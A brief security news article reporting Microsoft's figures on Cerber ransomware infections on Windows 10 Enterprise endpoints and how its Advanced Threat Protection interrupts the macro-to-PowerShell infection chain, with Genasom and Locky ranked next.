New figures from Microsoft have revealed that the Cerber ransomware has been the most prolific ransomware infection to have infected corporate environments.
Microsoft says it has seen 2114 infections by the ransomware between December and January on corporate endpoints running Windows 10 Enterprise. Microsoft says Windows 10 breaks the ransomware killchain thanks to an in-house ATP exploit mitigation service which normally comes at a cost.
Boasting of its threat protection capabilities, Windows 10 can allegedly recognise Cerber and other ransomware payloads and prevent most from executing any malicious activities. This will mostly likely be improved in an approaching upgrade so that infected machines can be isolated from a network, and there are also plans of adding quarantine capabilities.
These Cerber infections had appeared as early as July 2016, when the author of the ransomware had begun using Office 365 Macros to carry out infections.
Microsoft's security experts demonstrated how its Advanced Threat Protection works in a technical analysis of a Cerber killchain, which shows a customer running the macro need to run PowerShell, which then pulls a secondary component that held the payload.
As a result, the Cerber payload was unable to load, and the ATP protection generated four alerts to provide the security operations centres with command and control IP address data and Cerber payload information to help block emerging variants.
Ransomware families Genasom and Locky took second and third place for attacking Windows 10 Enterprise endpoints with about 1000 infections each.